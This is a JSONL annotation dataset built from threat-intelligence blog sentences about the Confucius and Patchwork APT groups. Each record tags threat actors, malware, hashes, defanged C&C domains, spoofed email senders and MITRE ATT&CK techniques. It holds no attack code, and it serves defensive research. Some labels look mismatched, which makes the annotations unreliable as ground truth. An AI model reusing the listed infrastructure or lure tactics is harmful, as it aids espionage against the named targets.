uses them as C&C servers. In this blog, we outlined our new findings related to these threat actors to help possible targets in the transportation and other industries.","entities":[],"relations":[],"Comments":[]} -{"id":4181,"text":"Information on how a threat enters and operates within a victim’s network is invaluable to security teams and can help them create more effective protection for vulnerable organizations.","entities":[],"relations":[],"Comments":[]} -{"id":4182,"text":"Organizations can also find capable security solutions that can help interpret and respond to malicious activities, techniques, and movements before the threat can culminate and affect an enterprise.","entities":[],"relations":[],"Comments":[]} -{"id":4183,"text":"Trend Micro Vision One™️ with Managed XDR gives security teams a consolidated view into valuable insights so they can organize a more solid line of defense ahead of attacks.","entities":[{"id":49984,"label":"SOFTWARE","start_offset":0,"end_offset":24}],"relations":[],"Comments":[]} -{"id":4184,"text":"For a list of the Indicators of Compromise, please see this document.","entities":[],"relations":[],"Comments":[]} -{"id":4185,"text":" MITRE ATT&CK Matrix Tactics ID Technique Initial access T1190","entities":[{"id":49985,"label":"identity","start_offset":2,"end_offset":8},{"id":49986,"label":"attack-pattern","start_offset":44,"end_offset":64}],"relations":[],"Comments":[]} -{"id":4186,"text":"Exploit public-facing application Execution T1059.001","entities":[{"id":49987,"label":"attack-pattern","start_offset":0,"end_offset":53}],"relations":[],"Comments":[]} -{"id":4187,"text":"Command and Scripting Interpreter: PowerShell T1059.003 Command and scripting interpreter: Windows Command Shell T1569.002","entities":[{"id":49988,"label":"tools","start_offset":35,"end_offset":45},{"id":49989,"label":"tools","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} -{"id":4188,"text":"System Services: Service Execution Persistence T1543.003","entities":[{"id":49990,"label":"attack-pattern","start_offset":17,"end_offset":56}],"relations":[],"Comments":[]} -{"id":4189,"text":"Create or Modify System Process: Windows Service T1574.002","entities":[{"id":49991,"label":"attack-pattern","start_offset":0,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4190,"text":"Hijack Execution Flow: DLL Side-Loading T1505.003 Server Software Component: Web Shell Defense evasion T1140","entities":[{"id":49992,"label":"attack-pattern","start_offset":0,"end_offset":49},{"id":49993,"label":"attack-pattern","start_offset":50,"end_offset":108}],"relations":[],"Comments":[]} -{"id":4191,"text":"Deobfuscate\/Decode Files or Information","entities":[{"id":49994,"label":"attack-pattern","start_offset":0,"end_offset":39}],"relations":[],"Comments":[]} -{"id":4192,"text":"T1480 Execution Guardrails T1574.002","entities":[{"id":49995,"label":"attack-pattern","start_offset":6,"end_offset":36}],"relations":[],"Comments":[]} -{"id":4193,"text":"Hijack Execution Flow: DLL Side-Loading T1070.001 Indicator Removal on Host: Clear Windows Event Logs T1027.002","entities":[{"id":49996,"label":"attack-pattern","start_offset":23,"end_offset":49},{"id":49997,"label":"attack-pattern","start_offset":77,"end_offset":111}],"relations":[],"Comments":[]} -{"id":4194,"text":"Obfuscated Files or Information: Software Packing T1218.011","entities":[{"id":49998,"label":"attack-pattern","start_offset":0,"end_offset":59}],"relations":[],"Comments":[]} -{"id":4195,"text":"Signed Binary Proxy Execution: Rundll32 T1036.005","entities":[{"id":49999,"label":"attack-pattern","start_offset":0,"end_offset":49}],"relations":[],"Comments":[]} -{"id":4196,"text":"Masquerading: Match Legitimate Name or Location T1197 BITS Jobs T1070.006","entities":[{"id":50000,"label":"attack-pattern","start_offset":14,"end_offset":73}],"relations":[],"Comments":[]} -{"id":4197,"text":"Indicator Removal on Host: Timestomp Credential Access T1003.001 OS Credential Dumping: LSASS Memory T1552.002","entities":[{"id":50001,"label":"attack-pattern","start_offset":27,"end_offset":64},{"id":50002,"label":"attack-pattern","start_offset":65,"end_offset":110}],"relations":[],"Comments":[]} -{"id":4198,"text":"OS Credential Dumping: Credentials in Registry Lateral Movement T1021.002","entities":[{"id":50004,"label":"attack-pattern","start_offset":0,"end_offset":73}],"relations":[],"Comments":[]} -{"id":4199,"text":"Remote Services: SMB\/Windows Admin Shares Discovery T1087.002","entities":[{"id":50005,"label":"attack-pattern","start_offset":17,"end_offset":61}],"relations":[],"Comments":[]} -{"id":4200,"text":"Account Discovery: Domain Account T1482 Domain Trust Discovery T1083 File and Directory Discovery Collection T1005 Data from Local System Command and control T1071.001","entities":[{"id":50008,"label":"attack-pattern","start_offset":69,"end_offset":114},{"id":50006,"label":"attack-pattern","start_offset":0,"end_offset":39},{"id":50007,"label":"attack-pattern","start_offset":40,"end_offset":68},{"id":50009,"label":"attack-pattern","start_offset":115,"end_offset":168}],"relations":[],"Comments":[]} -{"id":4201,"text":"Application layer protocol: web protocols T1095 Non-Application layer protocol T1090.001 Proxy: Internal Proxy Exfiltration T1567.002","entities":[{"id":50010,"label":"attack-pattern","start_offset":0,"end_offset":47},{"id":50011,"label":"attack-pattern","start_offset":48,"end_offset":88},{"id":50012,"label":"attack-pattern","start_offset":89,"end_offset":133}],"relations":[],"Comments":[]} -{"id":4202,"text":"Exfiltration to Cloud Storage Tags APT & Targeted Attacks | Endpoints | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":4203,"text":"Updated the appendix on August 30, 2018 to fix formatting and add new information.","entities":[{"id":50013,"label":"TIME","start_offset":24,"end_offset":39}],"relations":[],"Comments":[]} -{"id":4204,"text":"Back in February, we noted the similarities between the Patchwork and Confucius groups and found that, in addition to the similarities in their malware code, both groups primarily went after targets in South Asia.","entities":[{"id":50016,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50014,"label":"TIME","start_offset":8,"end_offset":16},{"id":50015,"label":"threat-actor","start_offset":56,"end_offset":65},{"id":50017,"label":"location","start_offset":202,"end_offset":212}],"relations":[{"id":898,"from_id":50015,"to_id":50016,"type":"related-to"},{"id":899,"from_id":50015,"to_id":50017,"type":"targets"},{"id":900,"from_id":50016,"to_id":50017,"type":"targets"},{"id":901,"from_id":50016,"to_id":50015,"type":"related-to"}],"Comments":[]} -{"id":4205,"text":"During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets.","entities":[{"id":50019,"label":"location","start_offset":116,"end_offset":125},{"id":50018,"label":"threat-actor","start_offset":52,"end_offset":61}],"relations":[{"id":902,"from_id":50018,"to_id":50019,"type":"targets"}],"Comments":[]} -{"id":4206,"text":"During their previous campaign, we found Confucius using fake romance websites to entice victims into installing malicious Android applications.","entities":[{"id":50020,"label":"threat-actor","start_offset":41,"end_offset":50},{"id":50021,"label":"SOFTWARE","start_offset":123,"end_offset":130}],"relations":[],"Comments":[]} -{"id":4207,"text":"This time, the threat actor seems to have a new modus operandi, setting up two new websites and new payloads with which to compromise its targets.","entities":[],"relations":[],"Comments":[]} -{"id":4208,"text":"Fake Android porn app and Windows chat applications as lures","entities":[],"relations":[],"Comments":[]} -{"id":4209,"text":"The first website uses adult content as a lure, via an Android application called Fuddi Duniya, which links to a website that displays nude pictures every day.","entities":[{"id":50022,"label":"SOFTWARE","start_offset":55,"end_offset":63},{"id":50023,"label":"malware","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} -{"id":4210,"text":"The app’s APK is linked directly from the homepage, with a disclaimer stating that Google Play does not allow pornography in their store.","entities":[{"id":50024,"label":"SOFTWARE","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} -{"id":4211,"text":" Figure 1: fake website with a link to download the Fuddi Duniya app.","entities":[{"id":50025,"label":"malware","start_offset":52,"end_offset":64}],"relations":[],"Comments":[]} -{"id":4212,"text":"The displayed Urdu text could be translated as “Real women, girls, and housewives || Download the app now More than thousands of women app.”","entities":[],"relations":[],"Comments":[]} -{"id":4213,"text":"The app’s features are similar to the previous malicious Android application, such as having the ability to record audio and steal SMS, accounts, contacts and certain file types from specific directories.","entities":[{"id":50026,"label":"SOFTWARE","start_offset":57,"end_offset":64},{"id":50028,"label":"attack-pattern","start_offset":125,"end_offset":177},{"id":50027,"label":"attack-pattern","start_offset":108,"end_offset":120}],"relations":[],"Comments":[]} -{"id":4214,"text":"In addition, the application now retrieves the last known location and uses the development platform Google Firebase to upload the stolen content.","entities":[{"id":50029,"label":"SOFTWARE","start_offset":101,"end_offset":116}],"relations":[],"Comments":[]} -{"id":4215,"text":" Figure 2: Stealing function excerpt from Fuddi Duniya Android app","entities":[{"id":50030,"label":"malware","start_offset":42,"end_offset":66}],"relations":[],"Comments":[]} -{"id":4216,"text":"The second fake website is again related to chat, with a background suggesting that it can help find users a partner.","entities":[],"relations":[],"Comments":[]} -{"id":4217,"text":"Initially, a link to a malicious Android application hosted on Google Play that shared the same features as the application described above was present.","entities":[{"id":50031,"label":"SOFTWARE","start_offset":63,"end_offset":74},{"id":50032,"label":"SOFTWARE","start_offset":33,"end_offset":40}],"relations":[],"Comments":[]} -{"id":4218,"text":"But after we reached out to Google while carrying out the research, the application was removed from the store and the link was removed from the fake website.","entities":[{"id":50033,"label":"identity","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} -{"id":4219,"text":" Figure 3. Screenshot of the second fake website","entities":[],"relations":[],"Comments":[]} -{"id":4220,"text":"Same as with the fake Tweety chat application we described in detail in our previous research, a Windows application with real chat features based on the open-source chat application RocketChat was offered.","entities":[{"id":50034,"label":"malware","start_offset":17,"end_offset":45}],"relations":[],"Comments":[]} -{"id":4221,"text":"Similarly, this application also comes bundled with malicious .NET code.","entities":[],"relations":[],"Comments":[]} -{"id":4222,"text":"While small and relatively simple, we found this malicious application interesting to analyze as it revealed the countries targeted by the threat actor.","entities":[],"relations":[],"Comments":[]} -{"id":4223,"text":"The application is a simple downloader that sends some basic information (username, antivirus, IP address, and operating system version) encrypted using triple Data Encryption Standard (DES). Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":4224,"text":"Sample of the app’s code Periodically, the malware tries to contact the Command-and-Control (C&C) server with the username encoded into parameters.","entities":[],"relations":[],"Comments":[]} -{"id":4225,"text":"Based on the information they retrieve, the operators can then decide to instruct the malware to download the second stage payload.","entities":[],"relations":[],"Comments":[]} -{"id":4226,"text":"This function is similar to the various versions of backdoors (such as sctrls and sip_telephone) that we analyzed in our previous blog post and whitepaper.","entities":[],"relations":[],"Comments":[]} -{"id":4227,"text":"An interesting feature of the downloader: It uses an online service to retrieve the victim's IP address and country, which it compares with a list of allowed countries.","entities":[],"relations":[],"Comments":[]} -{"id":4228,"text":"If the victim seemingly comes from a different country, the program will self-delete and quit.","entities":[],"relations":[],"Comments":[]} -{"id":4231,"text":"Excerpt of the valid country list We noted that it does both client-side and server-side IP filtering, showing that the attacker has improved its infrastructure.","entities":[],"relations":[],"Comments":[]} -{"id":4232,"text":"At the end of last year, a C&C from the same threat actor was not only accessible from any IP address, but it was possible to browse the server directory tree without authentication.","entities":[],"relations":[],"Comments":[]} -{"id":4233,"text":"After impersonating a fake victim of interest, we obtained a second stage payload (Detected as TROJ_DELF.XXWZ), which is a filestealer based on the Delphi programming language similar to the “svctrls” malware described in our previous blogpost.","entities":[{"id":50043,"label":"malware","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} -{"id":4234,"text":"This one is called “sysctrls” and it looks for files with the following extensions: ","entities":[],"relations":[],"Comments":[]} -{"id":4235,"text":"Extension File Type .doc, docx Microsoft Word document .xls,.xlsx","entities":[],"relations":[],"Comments":[]} -{"id":4236,"text":"Microsoft Excel document .ppt, .pptx Microsoft Powerpoint presentation .pptx","entities":[],"relations":[],"Comments":[]} -{"id":4237,"text":"Microsoft Powerpoint presentation .png, .jpg, .jpeg Image file .pst, .ost Microsoft Outlook file .csv","entities":[],"relations":[],"Comments":[]} -{"id":4238,"text":"Spreadsheet file ","entities":[],"relations":[],"Comments":[]} -{"id":4239,"text":"It then sends them via a POST HTTP request to windefendr[.]com\/description.php.","entities":[{"id":50044,"label":"URL","start_offset":46,"end_offset":78}],"relations":[],"Comments":[]} -{"id":4240,"text":"Further analysis of this filestealer revealed interesting links with other threat actor groups.","entities":[],"relations":[],"Comments":[]} -{"id":4241,"text":"The Delphi Link","entities":[],"relations":[],"Comments":[]} -{"id":4242,"text":"We already mentioned that Confucius had possible links to other groups in our previous blog post, which mentioned code sharing between Patchwork and Confucius.","entities":[{"id":50045,"label":"threat-actor","start_offset":26,"end_offset":35},{"id":50046,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":50047,"label":"threat-actor","start_offset":149,"end_offset":158}],"relations":[{"id":903,"from_id":50046,"to_id":50047,"type":"related-to"}],"Comments":[]} -{"id":4243,"text":"Both groups used a backdoor with the same configuration file structure and commands.","entities":[],"relations":[],"Comments":[]} -{"id":4244,"text":"We found more code shared among the two threat actor’s malware, as Patchwork recently used multiple Delphi malware similar to some of the Delphi malware we described before.","entities":[{"id":50049,"label":"malware","start_offset":138,"end_offset":152},{"id":50050,"label":"malware","start_offset":100,"end_offset":114},{"id":50048,"label":"threat-actor","start_offset":67,"end_offset":76}],"relations":[{"id":904,"from_id":50048,"to_id":50050,"type":"uses"},{"id":905,"from_id":50049,"to_id":50050,"type":"duplicate-of"}],"Comments":[]} -{"id":4245,"text":"We initially spotted some visual similarities between the malware used.","entities":[],"relations":[],"Comments":[]} -{"id":4246,"text":"Although no forms are displayed while the malware is running, we can see its TForm object in the Delphi decompiler.","entities":[],"relations":[],"Comments":[]} -{"id":4247,"text":"The TForm object often has two TTimer objects — but sometimes we have seen one or even three of these objects — usually with random names.","entities":[],"relations":[],"Comments":[]} -{"id":4248,"text":"Occasionally, listboxes with encrypted strings are also added.","entities":[],"relations":[],"Comments":[]} -{"id":4249,"text":"Figure 6: Decompiled Form structure of Confucius’ sample (d971842441c83c1bba05742d124620f5741bb5d5da9ffb31f06efa4bbdcf04ee, Detected as TSPY_CONFSTEAL.A) Figure 7:","entities":[{"id":50051,"label":"SHA2","start_offset":58,"end_offset":122},{"id":50052,"label":"malware","start_offset":136,"end_offset":152}],"relations":[{"id":906,"from_id":50051,"to_id":50052,"type":"indicates"}],"Comments":[]} -{"id":4250,"text":"Decompiled Form structure of Patchwork’s sample (795ae4097aa3bd5932be4110f6bd992f46d605d4c9e3afced314454d35395a59, Detected as TROJ_DELF.XXWZ)","entities":[{"id":12743,"label":"threat-actor","start_offset":29,"end_offset":38},{"id":12745,"label":"SHA2","start_offset":49,"end_offset":113},{"id":50053,"label":"malware","start_offset":127,"end_offset":141}],"relations":[{"id":907,"from_id":12745,"to_id":50053,"type":"indicates"},{"id":908,"from_id":12743,"to_id":50053,"type":"uses"}],"Comments":[]} -{"id":4251,"text":"While looking into any of the TTimers’ OnTimer methods, we often found a certain kind of structure: A pointer to an encrypted string stored in an EDX register followed by the call to the decryption function.","entities":[],"relations":[],"Comments":[]} -{"id":4252,"text":" Figure 8: Calling the decryption function This encouraged us to analyze the string encryption routines thoroughly.","entities":[],"relations":[],"Comments":[]} -{"id":4253,"text":"Our analysis revealed three of them.","entities":[],"relations":[],"Comments":[]} -{"id":4254,"text":"The first involves a very simple routine that flips every bit of the string.","entities":[],"relations":[],"Comments":[]} -{"id":4255,"text":"The second algorithm involves a hardcoded key, which is transformed by taking the five lower bits of each character, and then used as a XOR key.","entities":[],"relations":[],"Comments":[]} -{"id":4256,"text":"In some cases, the key is split in half in the binary, so it is first reunited before being used.","entities":[],"relations":[],"Comments":[]} -{"id":4257,"text":"Finally, our third algorithm uses a 94-character substitution table.","entities":[],"relations":[],"Comments":[]} -{"id":4258,"text":"This algorithm was previously discussed by security researchers in a Confucius-related blog post.","entities":[{"id":50054,"label":"threat-actor","start_offset":69,"end_offset":78}],"relations":[],"Comments":[]} -{"id":4259,"text":"For each of these routines, we found a recent sample going back to a domain name belonging to Patchwork’s infrastructure.","entities":[{"id":50055,"label":"threat-actor","start_offset":94,"end_offset":103}],"relations":[],"Comments":[]} -{"id":4260,"text":"The substitution tables of the third algorithm were randomly generated at build time, while the attacker seemingly set the keys used in the second algorithm.","entities":[],"relations":[],"Comments":[]} -{"id":4261,"text":"We found six different keys in the latter category that were different for the Patchwork and Confucius group.","entities":[{"id":50056,"label":"threat-actor","start_offset":79,"end_offset":88},{"id":50057,"label":"threat-actor","start_offset":93,"end_offset":102}],"relations":[],"Comments":[]} -{"id":4262,"text":"Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":4263,"text":"On the left, Confucius code, on the right, Patchwork’s code","entities":[{"id":50058,"label":"threat-actor","start_offset":13,"end_offset":22},{"id":50059,"label":"threat-actor","start_offset":43,"end_offset":52}],"relations":[],"Comments":[]} -{"id":4264,"text":"Interestingly, one of those keys, “xldbszcd”, was found in a file stealer used by Confucius (472ea4929c5e0fb4e29597311ed90a14c57bc67fbf26f81a3aac042aa3dccb55, Detected as TSPY_CONFSTEAL.A) as well as in two other file stealers.","entities":[{"id":50061,"label":"SHA2","start_offset":93,"end_offset":157},{"id":50062,"label":"malware","start_offset":171,"end_offset":187},{"id":50060,"label":"threat-actor","start_offset":82,"end_offset":91}],"relations":[{"id":909,"from_id":50061,"to_id":50062,"type":"indicates"},{"id":910,"from_id":50060,"to_id":50062,"type":"uses"}],"Comments":[]} -{"id":4265,"text":"One file stealer (cca74bb322ad7833a21209b1418c9837e30983daec30d199a839f46075ee72f2, Detected as TSPY_DELF.SUW) published by security researchers in 2013 and linked to the domain myflatnet[.]com, was attributed by several parties to the Hangover group.","entities":[{"id":50067,"label":"threat-actor","start_offset":236,"end_offset":250},{"id":50063,"label":"SHA2","start_offset":18,"end_offset":82},{"id":50064,"label":"malware","start_offset":96,"end_offset":109},{"id":50065,"label":"TIME","start_offset":148,"end_offset":152},{"id":50066,"label":"DOMAIN","start_offset":178,"end_offset":193}],"relations":[{"id":911,"from_id":50063,"to_id":50064,"type":"indicates"},{"id":912,"from_id":50064,"to_id":50066,"type":"communicates-with"},{"id":913,"from_id":50064,"to_id":50067,"type":"attributed-to"}],"Comments":[]} -{"id":4266,"text":"The other file stealer (1f0dabd61947b6df8a392b77a0eae33777be3caad13698aecc223b54ab4b859a, Detected as TROJ_DELF.XXWZ) is related to a domain reported in September 2016.","entities":[{"id":50069,"label":"malware","start_offset":102,"end_offset":116},{"id":50070,"label":"TIME","start_offset":153,"end_offset":167},{"id":50068,"label":"SHA2","start_offset":24,"end_offset":88}],"relations":[{"id":914,"from_id":50068,"to_id":50069,"type":"indicates"}],"Comments":[]} -{"id":4267,"text":"That report also mentioned InPage software targeting and Delphi backdoors.","entities":[],"relations":[],"Comments":[]} -{"id":4268,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} -{"id":4269,"text":"Left: Confucius group, Middle: Hangover group, Right: Unnamed group","entities":[{"id":50071,"label":"threat-actor","start_offset":6,"end_offset":21},{"id":50072,"label":"threat-actor","start_offset":31,"end_offset":45},{"id":50073,"label":"threat-actor","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} -{"id":4270,"text":"After some research, we found multiple Delphi backdoors that used any of the three decryption routines.","entities":[],"relations":[],"Comments":[]} -{"id":4271,"text":"The backdoors also linked to an infrastructure matching old Hangover domains as well as the infrastructure of domains from the September 2016 blog post.","entities":[{"id":50074,"label":"TIME","start_offset":127,"end_offset":141},{"id":50075,"label":"threat-actor","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} -{"id":4272,"text":"Some of these samples were several years old and had left the original name of the bit-flip decryption algorithm, which was “EnDecrypt”.","entities":[],"relations":[],"Comments":[]} -{"id":4273,"text":"This algorithm matches the following code snippet.","entities":[],"relations":[],"Comments":[]} -{"id":4274,"text":"Patchwork's Ongoing Campaigns","entities":[{"id":12808,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":4275,"text":"Aside from their Delphi malware, Patchwork is still active.","entities":[{"id":50076,"label":"threat-actor","start_offset":33,"end_offset":42}],"relations":[],"Comments":[]} -{"id":4276,"text":"Lately, they have been sending multiple RTF files exploiting CVE-2017-8570.","entities":[{"id":50077,"label":"vulnerability","start_offset":61,"end_offset":74}],"relations":[],"Comments":[]} -{"id":4277,"text":"The dropped payloads are modified versions of the Remote Administration Tool QuasarRAT that can be traced to the domains sastind-cn[.]org and tautiaos[.]com.","entities":[{"id":50080,"label":"DOMAIN","start_offset":142,"end_offset":156},{"id":50078,"label":"malware","start_offset":77,"end_offset":86},{"id":50079,"label":"DOMAIN","start_offset":121,"end_offset":137}],"relations":[{"id":915,"from_id":50078,"to_id":50079,"type":"communicates-with"},{"id":916,"from_id":50078,"to_id":50080,"type":"communicates-with"}],"Comments":[]} -{"id":4278,"text":"Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":4279,"text":"Process tree after a successful infection","entities":[],"relations":[],"Comments":[]} -{"id":4280,"text":"The attackers sometimes design the weaponized documents to look like legitimate documents of interest to the target.","entities":[],"relations":[],"Comments":[]} -{"id":4281,"text":"The documents are also unusually large — often more than 10 megabytes.","entities":[],"relations":[],"Comments":[]} -{"id":4282,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":4283,"text":"On the left, the weaponized document.","entities":[],"relations":[],"Comments":[]} -{"id":4284,"text":"On the right, the legitimate document from CSBA.","entities":[{"id":50081,"label":"identity","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} -{"id":4285,"text":"Note that the weaponized document was crafted to look like it came from CSBA but does not imply that CSBA or its related assets have been compromised ","entities":[{"id":50082,"label":"identity","start_offset":72,"end_offset":76},{"id":50083,"label":"identity","start_offset":101,"end_offset":105}],"relations":[],"Comments":[]} -{"id":4286,"text":"The group still uses the Badnews malware, a backdoor with information-stealing and file-executing capabilities, albeit updated with a slight modification in the encryption routine at the end of 2017, when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost.","entities":[{"id":50084,"label":"malware","start_offset":25,"end_offset":40},{"id":50085,"label":"attack-pattern","start_offset":58,"end_offset":78},{"id":50086,"label":"attack-pattern","start_offset":83,"end_offset":97},{"id":50087,"label":"TIME","start_offset":187,"end_offset":198},{"id":50088,"label":"threat-actor","start_offset":294,"end_offset":303}],"relations":[{"id":917,"from_id":50084,"to_id":50085,"type":"uses"},{"id":918,"from_id":50084,"to_id":50086,"type":"uses"}],"Comments":[]} -{"id":4287,"text":"Defending against Confucius and Patchwork Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective.","entities":[{"id":50089,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50090,"label":"threat-actor","start_offset":32,"end_offset":41},{"id":50091,"label":"threat-actor","start_offset":61,"end_offset":70},{"id":50092,"label":"threat-actor","start_offset":75,"end_offset":84}],"relations":[],"Comments":[]} -{"id":4288,"text":"To help combat these kinds of threats organizations will need to take a more proactive and focused security posture that can cover the most ground in terms of security.","entities":[],"relations":[],"Comments":[]} -{"id":4289,"text":"Some specific security measures organizations can implement: Recognize social engineering attempts.","entities":[],"relations":[],"Comments":[]} -{"id":4290,"text":"Malicious mobile apps are common infection vectors for cybercriminals, as they can attract specific target audiences.","entities":[],"relations":[],"Comments":[]} -{"id":4291,"text":"In this case, Confucius went with the common adage “sex sells” Proactively monitor the organization’s network.","entities":[{"id":50093,"label":"threat-actor","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} -{"id":4292,"text":"Threat actors are notorious for creating stealthy malware that can bypass superficial network monitoring.","entities":[],"relations":[],"Comments":[]} -{"id":4293,"text":"A more proactive stance that includes proper application of firewalls and intrusion detection and prevention systems can help mitigate the impact of an attack Implement network segmentation.","entities":[],"relations":[],"Comments":[]} -{"id":4294,"text":"Even with the best security technology, there is still a chance of an attack slipping through.","entities":[],"relations":[],"Comments":[]} -{"id":4295,"text":"Separating the network into individual parts, as well as restricting access to only those who really need it, can mitigate the damage that occurs in case of a successful attack.","entities":[],"relations":[],"Comments":[]} -{"id":4296,"text":"Update systems regularly.","entities":[],"relations":[],"Comments":[]} -{"id":4297,"text":"Everything from endpoints to network software to IoT devices should be patched and updated to prevent or minimize the chance of a threat actor exploiting a vulnerability In an ideal scenario, an organization’s in-house security team implement all of these and other security measures.","entities":[],"relations":[],"Comments":[]} -{"id":4298,"text":"The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks.","entities":[{"id":50094,"label":"threat-actor","start_offset":143,"end_offset":152}],"relations":[],"Comments":[]} -{"id":4299,"text":"Since these teams also handle the day-to-day IT requirements of the organization, taking on a more involved and proactive stance may not be easy.","entities":[],"relations":[],"Comments":[]} -{"id":4300,"text":"In this case, an organization can look into third party security providers who can handle specialized work, such as root cause analysis and detailed research, and also provide a remediation plan that gives organizations a better chance against advanced threats.","entities":[],"relations":[],"Comments":[]} -{"id":4301,"text":"Trend Micro Solutions Patchwork uses email as an entry point, which is why securing the email gateway is important.","entities":[{"id":50095,"label":"identity","start_offset":0,"end_offset":11},{"id":50096,"label":"threat-actor","start_offset":22,"end_offset":31}],"relations":[],"Comments":[]} -{"id":4302,"text":"Trend Micro™ Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. Trend Micro™ Email Inspector and InterScan™ Web Security prevent malware from ever reaching end users.","entities":[{"id":50097,"label":"SOFTWARE","start_offset":0,"end_offset":27},{"id":50098,"label":"attack-pattern","start_offset":132,"end_offset":146},{"id":50099,"label":"attack-pattern","start_offset":164,"end_offset":189},{"id":50100,"label":"attack-pattern","start_offset":148,"end_offset":158},{"id":50101,"label":"SOFTWARE","start_offset":222,"end_offset":250},{"id":50102,"label":"SOFTWARE","start_offset":255,"end_offset":278}],"relations":[],"Comments":[]} -{"id":4303,"text":"At the endpoint level, Trend Micro™ Smart Protection Suites deliver several capabilities that minimize the impact of Patchwork’s attacks.","entities":[{"id":12917,"label":"threat-actor","start_offset":117,"end_offset":126},{"id":50103,"label":"SOFTWARE","start_offset":23,"end_offset":59}],"relations":[],"Comments":[]} -{"id":4304,"text":"These solutions are powered by Trend Micro XGen™ security, which provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints.","entities":[{"id":50104,"label":"SOFTWARE","start_offset":31,"end_offset":48}],"relations":[],"Comments":[]} -{"id":4305,"text":"It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protect physical, virtual, and cloud workloads.","entities":[],"relations":[],"Comments":[]} -{"id":4306,"text":"This appendix contains the latest indicators of compromise (IOCs) related to the different groups.","entities":[],"relations":[],"Comments":[]} -{"id":4307,"text":" Tags APT & Targeted Attacks | Endpoints | Research | Network","entities":[],"relations":[],"Comments":[]} -{"id":4308,"text":"Introduction","entities":[],"relations":[],"Comments":[]} -{"id":4309,"text":"While investigating the Confucius threat actor, we found a recent spear phishing campaign that utilizes Pegasus spyware-related lures to entice victims into opening a malicious document downloading a file stealer.","entities":[{"id":50105,"label":"attack-pattern","start_offset":66,"end_offset":80},{"id":50106,"label":"malware","start_offset":104,"end_offset":111}],"relations":[],"Comments":[]} -{"id":4310,"text":"The NSO Group’s spyware spurred a collaborative investigation that found that it was being used to target high-ranking individuals in 11 different countries.","entities":[{"id":50108,"label":"threat-actor","start_offset":4,"end_offset":13}],"relations":[],"Comments":[]} -{"id":4311,"text":"In this blog entry, we take a look at the lures used by the malicious actor and provide a short analysis of the file stealer used in the campaign, which was launched in early August.","entities":[{"id":50109,"label":"TIME","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} -{"id":4312,"text":"The contents of the spear phishing email The campaign involves a two-step attack.","entities":[{"id":50110,"label":"attack-pattern","start_offset":20,"end_offset":34},{"id":50111,"label":"attack-pattern","start_offset":65,"end_offset":80}],"relations":[],"Comments":[]} -{"id":4313,"text":"During the first phase, an email without a malicious payload containing content copied from a legitimate Pakistani newspaper’s article is sent to the target.","entities":[],"relations":[],"Comments":[]} -{"id":4314,"text":"The sender address, which is spoofed, impersonates the PR wing of the Pakistani Armed Forces (info@ispr.gov.pk).","entities":[{"id":50113,"label":"identity","start_offset":70,"end_offset":92},{"id":50112,"label":"EMAIL","start_offset":94,"end_offset":110}],"relations":[],"Comments":[]} -{"id":4315,"text":"Two days later, a second email — purportedly a warning from a Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target.","entities":[{"id":50115,"label":"malware","start_offset":91,"end_offset":98},{"id":50116,"label":"DOMAIN","start_offset":122,"end_offset":129},{"id":50114,"label":"identity","start_offset":62,"end_offset":80}],"relations":[],"Comments":[]} -{"id":4316,"text":"The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk). Figure 1.","entities":[{"id":12964,"label":"EMAIL","start_offset":78,"end_offset":95}],"relations":[],"Comments":[]} -{"id":4317,"text":"Spear-phishing email from early August.","entities":[{"id":50118,"label":"TIME","start_offset":32,"end_offset":38},{"id":50117,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} -{"id":4318,"text":"Notice the insertion of logos from the Pakistani Army, Air Force, Navy, and PR department.","entities":[{"id":50120,"label":"identity","start_offset":55,"end_offset":64},{"id":50121,"label":"identity","start_offset":66,"end_offset":70},{"id":50122,"label":"identity","start_offset":76,"end_offset":89},{"id":50119,"label":"identity","start_offset":39,"end_offset":53}],"relations":[],"Comments":[]} -{"id":4319,"text":" If the target clicks on either the link or on the “unsubscribe” link, it will download a Word document from the domain parinari[.]xyz.","entities":[{"id":50123,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} -{"id":4320,"text":"The emails are sent either from an ExpressVPN exit node in Pakistan, or from a mail server under the attacker’s control.","entities":[{"id":50124,"label":"SOFTWARE","start_offset":35,"end_offset":45},{"id":50125,"label":"location","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} -{"id":4321,"text":"Examining the encrypted document containing macros After entering the password mentioned in the message, a document containing macros is displayed on screen.","entities":[],"relations":[],"Comments":[]} -{"id":4322,"text":" Figure 2. Malicious document containing macros ","entities":[{"id":50126,"label":"attack-pattern","start_offset":15,"end_offset":33}],"relations":[],"Comments":[]} 